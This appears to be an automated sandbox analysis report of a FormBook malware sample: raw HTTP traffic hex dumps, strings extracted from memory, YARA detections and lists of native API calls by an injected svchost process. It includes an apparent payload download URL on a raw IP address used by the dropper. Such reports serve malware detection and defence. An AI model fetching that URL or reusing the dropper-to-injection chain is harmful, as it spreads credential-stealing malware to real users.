44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Thu, 28 Nov 2024 09:07:53 GMTServer: NetlifyX-Nf-Request-Id: 01JDS0DRECV0QCFB3VMWN6DWR9Connection: closeTransfer-Encoding: chunkedData Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Thu, 28 Nov 2024 09:07:56 GMTServer: NetlifyX-Nf-Request-Id: 01JDS0DTXNT6WHCKFYNRXSQH0SConnection: closeTransfer-Encoding: chunkedData Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 09:08:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: phl-web-03X-Frontend: phl-frontend-01X-Trace-Id: ti_5b4d2af7f47172ab0c7e3938fb93bc67Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 09:08:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: phl-web-03X-Frontend: phl-frontend-01X-Trace-Id: ti_c275695ec835c24b79fdf1b98c0f041eContent-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 09:08:12 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: phl-web-03X-Frontend: phl-frontend-01X-Trace-Id: ti_0e1ea0d4fccdbcb1b40b9e304d7b0d5eData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
            Source: Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.63/kybqONxtMLpRGBHO51.bin
            Source: Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.63/kybqONxtMLpRGBHO51.bin_
            Source: Stemmeurnes.exe, 00000006.00000002.3680894814.0000000006FB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.63/ta
            Source: powershell.exe, 00000002.00000002.3448936955.0000000002C26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mid
            Source: svchost.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Salmebogs(1).exe, 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Salmebogs(1).exe, 00000000.00000000.2271359918.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Stemmeurnes.exe, 00000006.00000000.3447638821.000000000040A000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Stemmeurnes.exe, 00000006.00000001.3448532289.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Stemmeurnes.exe, 00000006.00000001.3448532289.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.3449858507.0000000004BE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.3452317093.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: C:\Users\user\Desktop\Salmebogs(1).exeCode function: 0_2_004052CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052CB

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AA35C0 NtCreateMutant,LdrInitializeThunk,6_2_22AA35C0
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AA2B60 NtClose,LdrInitializeThunk,6_2_22AA2B60
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AA2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_22AA2C70
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeCode function: 6_2_22AA2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_22AA2DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03474340 NtSetContextThread,LdrInitializeThunk,8_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03474650 NtSuspendThread,LdrInitializeThunk,8_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034735C0 NtCreateMutant,LdrInitializeThunk,8_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472B60 NtClose,LdrInitializeThunk,8_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472AD0 NtReadFile,LdrInitializeThunk,8_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472AF0 NtWriteFile,LdrInitializeThunk,8_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_034739B0 NtGetContextThread,LdrInitializeThunk,8_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472F30 NtCreateSection,LdrInitializeThunk,8_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472FE0 NtCreateFile,LdrInitializeThunk,8_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472FB0 NtResumeThread,LdrInitializeThunk,8_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472DD0 NtDelayExecution,LdrInitializeThunk,8_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472C60 NtCreateKey,LdrInitializeThunk,8_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03473010 NtOpenDirectoryObject,8_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03473090 NtSetValueKey,8_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472B80 NtQueryInformationFile,8_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472AB0 NtWaitForSingleObject,8_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03472F60 NtCreateProcessEx,8_2_03472F60
